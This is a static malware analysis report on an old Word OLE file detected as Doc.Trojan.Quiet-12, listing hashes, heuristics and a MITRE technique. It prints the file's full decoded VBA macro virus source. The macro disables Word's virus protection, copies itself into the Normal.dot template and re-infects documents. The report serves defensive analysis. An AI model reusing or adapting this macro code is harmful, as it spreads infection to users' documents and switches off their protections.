Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c7419b3473308c43…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 2001-07-04 19:46:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ad64f6358465ef095c621291fbfcfecd
SHA-1: 65df80ad7d777699466649ce21575c86c571214d
SHA-256: c7419b3473308c432e539470c5750c6190e45716f133a9e4427bfcacf4789bb1
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, specifically a Document_Open macro, which is designed to copy itself to the Normal.dot template. This action establishes persistence for the macro, allowing it to execute every time a new document is created. The ClamAV detection of 'Doc.Trojan.Quiet-12' further supports the malicious nature of this file.

Heuristics 3

  • ClamAV: Doc.Trojan.Quiet-12 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Quiet-12
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 946 bytes
SHA-256: 2e0f56dca3c9a959264ea5f3260094f86e7229c02071e4d08e8f31958d9ac178
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Close()

End Sub

Private Sub Document_open()
 Application.Options.VirusProtection = False
 Set Source = ActiveDocument.VBProject.VBComponents.Item(1)
 Set dest = NormalTemplate.VBProject.VBComponents.Item(1)
 If dest.codemodule.CountOfLines = 0 Then
  For i = 1 To Source.codemodule.CountOfLines
     dest.codemodule.insertlines i, Source.codemodule.lines(i, 1)
  Next i
  Application.Options.SaveNormalPrompt = False
End If

If Source.codemodule.CountOfLines = 0 Then
 For i = 1 To dest.codemodule.CountOfLines
  Source.codemodule.insertlines i, dest.codemodule.lines(i, 1)
 Next i
 ActiveDocument.SaveAs (ActiveDocument.FullName)
 End If
End Sub